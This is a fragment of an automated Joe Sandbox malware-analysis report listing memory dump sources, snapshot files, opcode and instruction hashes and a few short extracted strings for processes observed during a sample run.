                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5ecaaefa9d0ea30f59eca8e779ae2c46502831a486c86e283159f849ef8a94e
                                      • Instruction ID: e13e49dfe8bdc3b86a31ddf575b393423c9a7a05fb8e201b0e5ada9b31a88d2f
                                      • Opcode Fuzzy Hash: b5ecaaefa9d0ea30f59eca8e779ae2c46502831a486c86e283159f849ef8a94e
                                      • Instruction Fuzzy Hash: EF1100B0E1995A9FEB94DB18C4457AAB3F1FF58340F5086AAC40DD3156DB34AD81CF40
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction ID: 5176c46ee86f2d019d7fc6e8d30061eb26997b6a67a5ce87ac2d3a1a3ad34aa1
                                      • Opcode Fuzzy Hash: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction Fuzzy Hash: 3F015E30A0890E8FEB99EF68C4556FA77A1FF58344F60457ED41EC7192CA36A950CB41
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f33fe7acb964d697942bbd88d77cc51e0a9bd937d243a3c1f68397f896a89877
                                      • Instruction ID: 8e7231b3031a38085fa62a708941219b23ce8e197f3b734d401999b18d491009
                                      • Opcode Fuzzy Hash: f33fe7acb964d697942bbd88d77cc51e0a9bd937d243a3c1f68397f896a89877
                                      • Instruction Fuzzy Hash: 1911A770D185199FEBA5EB18C8557EDB6B2FF58340F6041BAD40DE6292DE38AE85CF00
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d062cd27e8194d0fc6d290e0bdd3d97bb48959854f6b8c3f4239c6fd3beb501e
                                      • Instruction ID: 9385d3df464d394acc12dfedcd9eb9577302f3769b96ec61be3e7e3e188ffc90
                                      • Opcode Fuzzy Hash: d062cd27e8194d0fc6d290e0bdd3d97bb48959854f6b8c3f4239c6fd3beb501e
                                      • Instruction Fuzzy Hash: 9B01F530D0D6898FDB4ADB6484692BE7BB0FF2A340F5504FEC44ACB092DE39A840C752
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d3a5357c0ae6841256070d12a4e7722faff205036b5d743337042c2ee82ae7f
                                      • Instruction ID: 49ae81dfc0dab45bc542bfd8a63825ca00ee0e4df705451adb27efe5acdbf0ba
                                      • Opcode Fuzzy Hash: 4d3a5357c0ae6841256070d12a4e7722faff205036b5d743337042c2ee82ae7f
                                      • Instruction Fuzzy Hash: 9A015E3091891E8FEB84EFA8C4592BD77E5FF18384F20097AE81ED3192DE75A950C741
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction ID: a054a15ff066af728e3fd6cc5bdfdc2ee285dedc033bcba976c7649f8c09c664
                                      • Opcode Fuzzy Hash: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction Fuzzy Hash: 23112A75D0811ACEDB14EF69D4447FCB7B1FF14341F6041BAE019A6282DB385A84DF65
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction ID: cb6c613c69de1a1fd4e950a743fad0072bf887ab0113596b6459cf5a79695f97
                                      • Opcode Fuzzy Hash: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction Fuzzy Hash: EF017131D5D6894FE752AB78885A5A97BE0FF49340F1609F7D908CB0A3EA2CA884C701
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction ID: e17cd519c82e137246d77da288008320082d10a7c6f4a2746e85b8917aa0b010
                                      • Opcode Fuzzy Hash: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction Fuzzy Hash: CD018B74D1864E8FEB91EB68848D7B97BE0FF59341F1545BAD808C60A2EA38E584C701
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction ID: 84957ea82c1636413e7efddbcd0efca31d3b5aab1338b0c1bc31f9916c3b03a2
                                      • Opcode Fuzzy Hash: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction Fuzzy Hash: 12018430E1D68A8FEB52AB7884991A97BE4FF49340F1509F2D508CB0A2DA28A844C712
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction ID: 127eb7fd8f26274b2e008ce58c64181bab20bc1ac3bbf0cefc3118cc3adf9237
                                      • Opcode Fuzzy Hash: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction Fuzzy Hash: 3101D430D596498FDB88EB64C46D2BE7BA0FF49340F5404BED40ACA192DE39A950C711
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction ID: 8b43c301dc6a4a2be54fb2377534a597d30d0f24f5dc1dd013e5c7f92cd4178d
                                      • Opcode Fuzzy Hash: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction Fuzzy Hash: 7A01A27091D64A9FE742EB7888596A97BF1FF09380F5549F6D418C70A3FE38A944C702
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction ID: 2364dff17c4115067b9defa4c7d946857a07b779422368d4dd7f2d5055fcd815
                                      • Opcode Fuzzy Hash: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction Fuzzy Hash: 7B016D7091850E9EEB58EF2CC4692B977A0FF18341F2008BED40EC6092DE75AA50C701
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction ID: f9537640c1ba5231fe7ea78dd020ecf4bc2e522d31fa8ef322b43cf66f9b0f2d
                                      • Opcode Fuzzy Hash: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction Fuzzy Hash: F501313091850EAFEB68EB68C4596B977E0FF18345F60087ED41EC61D2DE39A990C611
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction ID: fee511ce182148a18523f624715144315859d11be7f51d6a3383cc8edf5ceb8d
                                      • Opcode Fuzzy Hash: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction Fuzzy Hash: 3901313095450EAEEBA8EB68C4592B977A0FF18345F60087ED41EC61D2DE39A550C641
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction ID: e37c3e3672d302c4953097e265c8819e0362ae79edc24a60c63d11b92c9b4eb6
                                      • Opcode Fuzzy Hash: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction Fuzzy Hash: 76F0AF70D18A1E8AFB989BAC98583FA77E0FF66391F10067AD41AC61C2DE241958C641
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed9000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction ID: ca48122b1390b52945c1789a1819928d9b5d92e7ca45aa80b3900dcdcee6dce0
                                      • Opcode Fuzzy Hash: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction Fuzzy Hash: 530144B0E1891E9EE741EB7CC44D6BA76E2FF58345F6048B5D41DC7196EE38B484CA01
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction ID: ac2eddc4b8ff406a66cb308c23fdc74372f9d81608dfca3c08be9bd9eb3c42f2
                                      • Opcode Fuzzy Hash: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction Fuzzy Hash: 7FF08C30909A4E8FEB99DF288859AFA77A0FF55345F60057AE819C6192CB39E850CB40
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction ID: 5e57666e62cd18069597734d40642dcf2900f3be3e3a7b92e3163f2918a05a37
                                      • Opcode Fuzzy Hash: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction Fuzzy Hash: ABF0F03091960E8FEB99EF2894452FA37A0FF15344F60053AE80DC7182CB39E8A0CB81
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee4000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction ID: 9bbe1458e246601564384d4c373760fb14b0c89b9f9084aabf967dca4402890d
                                      • Opcode Fuzzy Hash: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction Fuzzy Hash: D901EE74D0861A8FEF64EF94D4946ECBAB1FB18361F24016ED009E2291DB386988CB25
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction ID: 7546c906aad585d8a0dd0a21b8e2f18813a0a0b07e88956874a77f18f9b87990
                                      • Opcode Fuzzy Hash: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction Fuzzy Hash: ABF0C83180D3899FDB659F2484252A93B60FF05340F5504BED449C60D3DA3C9854C741
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction ID: 7b5797627245b8f1c101049567410d2467ae9a3eda0377c8cae0442e7d02e34e
                                      • Opcode Fuzzy Hash: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction Fuzzy Hash: 6CF0FE70D1455E8EEB94EF6898182FE77A4FF18305F50053BE81DC2291EB345594C651
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction ID: 40327963e551d2ddae569dbefb565386d5602c8fadc95ba7007732e15d1d72e1
                                      • Opcode Fuzzy Hash: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction Fuzzy Hash: 0BF0243081E78A8FEB689F28842A2B93BA0FF05314F0404BEE509C60D3DB3D9850C301
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ed0000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction ID: ac54cb65d350466c33ff5c37ed4e69759a8bca49b465f212bef2eeff336c4a6e
                                      • Opcode Fuzzy Hash: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction Fuzzy Hash: 60F0153090851ACEEB64EF14C849BED73A0FB50341F2005BAC00ED22A2CE782E84CB40
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction ID: 805c8ac2244c1e409037d90ecea76f7b85daba154eb5b6794332551378a9b6a6
                                      • Opcode Fuzzy Hash: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction Fuzzy Hash: EBD012B0C0862D8BDF00DFA0CC10AEE73B1BF10340F000566900AAB2C5CBB86948CB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1537157709.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ff886ee1000_hvxmowIikyCfRrhhAMpWFavmEnuKtL.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !$"$#$+$-$/$[${$}
                                      • API String ID: 0-3989209503
                                      • Opcode ID: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction ID: 38bf1e27ccb928f26d741cd526bd30adfa94575ddc1e5a897dc569b4052b0e2a
                                      • Opcode Fuzzy Hash: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction Fuzzy Hash: F1B1C370D082298FEBA8DF54D8987EDB7B1BF49341F2045B9D04EA6281CB386E85CF51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Y_H
                                      • API String ID: 0-219585648
                                      • Opcode ID: 5bc2cab24bad64406eebf7e6f5d140620b21e691b747dbf529aec43393143508
                                      • Instruction ID: 42046e40def8362242631f4afa73851ee9ad35e83fb3c9b7340226a4c80dd4f8
                                      • Opcode Fuzzy Hash: 5bc2cab24bad64406eebf7e6f5d140620b21e691b747dbf529aec43393143508
                                      • Instruction Fuzzy Hash: D291C271E289498FEB94DB68D8593E9BBE1FB6A350F54017AC00DE72C6DF685801C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$/
                                      • API String ID: 0-2662438755
                                      • Opcode ID: 27808042ac56fb1295fff866c786a87f9b6098f26371e97d393223ff10598d9b
                                      • Instruction ID: 9d5bbb2a644bb11f9bacca212ad0b6e6330e365b935f5ead03fb3507191ce6af
                                      • Opcode Fuzzy Hash: 27808042ac56fb1295fff866c786a87f9b6098f26371e97d393223ff10598d9b
                                      • Instruction Fuzzy Hash: 85210834D0462D8BDB68CF94C8647EDB3B2BF95340F1482AAD00AAB2C4DB745E84DF41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UWVH
                                      • API String ID: 0-545401801
                                      • Opcode ID: c4c5bd99355fa923bf8db5a4f22df26fe750f4425c021b9720441f756e245a71
                                      • Instruction ID: 13ad97d6e64a74688db743690e05135a21e15db2a221be508c75118e54cbb031
                                      • Opcode Fuzzy Hash: c4c5bd99355fa923bf8db5a4f22df26fe750f4425c021b9720441f756e245a71
                                      • Instruction Fuzzy Hash: 3441F970A2461E8FEB84EB98D85A6EDB7B1FF58340F540579E409E7292CE386841CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H|{
                                      • API String ID: 0-2800150826
                                      • Opcode ID: e1851261a8e7c44ca1f7d376783575787842fb0ac87dac7faeee6834786a7c50
                                      • Instruction ID: eba4a515d66b3f796083e4f78fc819eee947238ae36a32991b4a5f1fd688235f
                                      • Opcode Fuzzy Hash: e1851261a8e7c44ca1f7d376783575787842fb0ac87dac7faeee6834786a7c50
                                      • Instruction Fuzzy Hash: 55D0C971C19A0ACFE6A4DA18844E3A9BBF1FF54740B54006AD408A2142DF201852DB01
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction ID: 46da97bfff9c85499692a2a209e2050eb6566326d769298eaa5592b13377f8eb
                                      • Opcode Fuzzy Hash: fe2fbd040911f6413725c3723afe3563915c53dc1fca11c5935fe193411900bd
                                      • Instruction Fuzzy Hash: 5CB12607E0D6D24EE21176ACB8592F97F90FF922A5B1C81B7D08C9E0D7DD18AC4AC295
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction ID: 64b8cd2facba43180e62a5798fb5c8b1c61fa3e6e61e8d4afc19949f2f9aebd5
                                      • Opcode Fuzzy Hash: 9556d8eacc547ddee0ff391c7263931c761df9680f19a2adcefbdbe7b902c476
                                      • Instruction Fuzzy Hash: 38912803E0D6D24EE21166BCB8592F96F90FF912A5F1C81B7D08CAE0D7DD18AC4AC295
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction ID: 9751d4342a94016a54ef93e1b25aefe8eface09f826a788b8da2be75e56adb45
                                      • Opcode Fuzzy Hash: 0b3deed561b7c75fb03de71d8dbce39860de39346d3c6cfb980acd7cf57868bd
                                      • Instruction Fuzzy Hash: 60912712E0D6D24FE21166BCB8592F97F90FF922A1B1C81F7D0889E0D7DD18AC4AC395
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction ID: 932d674c3ec7b0efc881c18e2f7f0b770b118fa3143ce4f840cd120cc55dc890
                                      • Opcode Fuzzy Hash: 952cacd90d23d99c8bd64da47c7fe90538f8da8ee5ee6b153237ad173f24c8d7
                                      • Instruction Fuzzy Hash: A881BE31A1CA498BDB58DE1C98956B977E2FFD8750F28017ED44ED3286DE34AC02C781
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction ID: 643f0fdc5cf5cfaa5a7fd3892a708f21d9ad24afdcd7868be6cd0b60410e01c6
                                      • Opcode Fuzzy Hash: ed830c267192e22b6fc98651a1685c4a4e0d3812f6d24bae5c0adc1771c64002
                                      • Instruction Fuzzy Hash: 3F711912E0D6D14FE21166BCB8592F96F90FF912A1F1C81F7D0899E0DBDC58AC4AC295
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
